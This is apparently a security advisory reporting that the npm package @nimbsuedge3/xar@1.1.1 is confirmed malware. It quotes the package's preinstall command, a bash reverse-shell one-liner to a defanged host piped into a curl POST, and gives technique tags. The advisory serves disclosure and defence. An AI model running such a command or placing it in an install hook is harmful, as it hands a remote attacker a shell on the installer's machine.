LWA-2026-12293 MAL-2026-16301 ↗ confirmed malware

@nimbsuedge3/xar@1.1.1

Malicious code in @nimbsuedge3/xar (npm)

T1059.004 · Unix ShellT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The package's preinstall hook opens an interactive reverse shell to 147[.]93[.]157[.]202[.]nip[.]io:8080 (`bash -i >& /dev/tcp/147[.]93[.]157[.]202[.]nip[.]io/8080 0>&1`) and pipes the shell session to a curl POST to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php. Installing the package gives the remote host an interactive shell on the installer's machine. The package ships no other code (package.json only).

analyzed by
Leitwacht
first seen
Sep 21, 2026, 01:33 AM
analyzed
Sep 21, 2026, 01:33 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.